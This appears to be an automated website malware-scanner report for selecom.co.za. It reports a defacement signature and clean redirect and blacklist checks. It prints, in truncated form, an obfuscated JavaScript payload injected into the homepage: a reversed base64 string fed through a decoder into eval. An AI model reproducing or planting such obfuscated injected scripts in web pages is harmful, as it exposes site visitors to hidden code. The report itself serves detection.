Malware Scanner report for selecom.co.za

Malicious/Suspicious/Total urls checked: 1/0/2

1 page has malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: Found

Probably the website is defaced. The following signature was found:

ҳ̸Ҳ̸ҳ Hacked By Hacker Sakit Hati ҳ̸Ҳ̸ҳ (11 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.selecom.co.za/	200 OK Content-Length: 32683 Content-Type: text/html	suspicious
Malicious code - confirmed by antiviruses (see below) var I1I='=oQKpkyJ8dCK0lGbwNnLnwWYu9Wa0l2cuFmcUBjM8hTQzwHewVTN1E0M8ZzMENDf3cTNENDf4BHOBNDf4BXO0cTQzwHN0Q0M8dDOBNDf2UTNENDf4BHN3ETQzwHM1cDRzwnM5E0M8NDNENDf4B3N5ETQzwnNENDf4BnM3cTQzwHewVDNBNDf4BnM3UTQzwHewVDOxE0M8hzMBNDfzMTQzwXMzUDRzwHewljMxE0M8BjM3Q0M8lzMENDf4Q0M8NzNBNDflxWe0N3M3UDRzwXO4E0M8BjN3Q0M8hHc4ATMBNDf5E0M8VTMENDfxMDRzwHewdDNBNDf4BXN4cTQzwnN4cDRzwHewljM3E0M8hHcwE0M8JzN3Q0M8ZmZpdGfyUTQzwXN1cDRzwHewVTN3E0M8JjMENDfzEDRzw3NyQ0M8lTN3Q0M8BDOBNDf0MTQzwXN4E0M8hHcxMzNBNDf3QDRzwHewZTQzw3NIJTUHljTXFH ... 3048 bytes are skipped ...OOlOI.indexOf(data.charAt(i++));h4=_0OOlOI.indexOf(data.charAt(i++));bits=h1<<18\|h2<<12\|h3<<6\|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _0OO(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_0O0(_0OO(I1I))); Antivirus reports: McAfee-GW-Edition Heuristic.BehavesLike.JS.Suspicious.G Deface/Content modification. The following signature was found: ҳ̸Ҳ̸ҳ Hacked By Hacker Sakit Hati ҳ̸Ҳ̸ҳ <script language='javascript' type='text/javascript'>var I1I='=oQKpkyJ8dCK0lGbwNnLnwWYu9Wa0l2cuFmcUBjM8hTQzwHewVTN1E0M8ZzMENDf3cTNENDf4BHOBNDf4BXO0cTQzwHN0Q0M8dDOBNDf2UTNENDf4BHN3ETQzwHM1cDRzwnM5E0M8NDNENDf4B3N5ETQzwnNENDf4BnM3cTQzwHewVDNBNDf4BnM3UTQzwHewVDOxE0M8hzMBNDfzMTQzwXMzUDRzwHewljMxE0M8BjM3Q0M8lzMENDf4Q0M8NzNBNDflxWe0N3M3UDRzwXO4E0M8BjN3Q0M8hHc4ATMBNDf5E0M8VTMENDfxMDRzwHewdDNBNDf4BXN4cTQzwnN4cDRzwHewljM3E0M8hHcwE0M8JzN3Q0M8ZmZpdGfyUTQzwXN1cDRzwHewVTN3E0M8JjMENDfzEDRzw3NyQ0M8lTN3 ...[32347 bytes skipped]...
http://www.selecom.co.za/test404page.js	404 Not Found Content-Length: 331 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: selecom.co.za

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: selecom.co.za
Referer: http://www.google.com/search?q=selecom.co.za

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=selecom.co.za

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://selecom.co.za/

Result: selecom.co.za is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for selecom.co.za

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools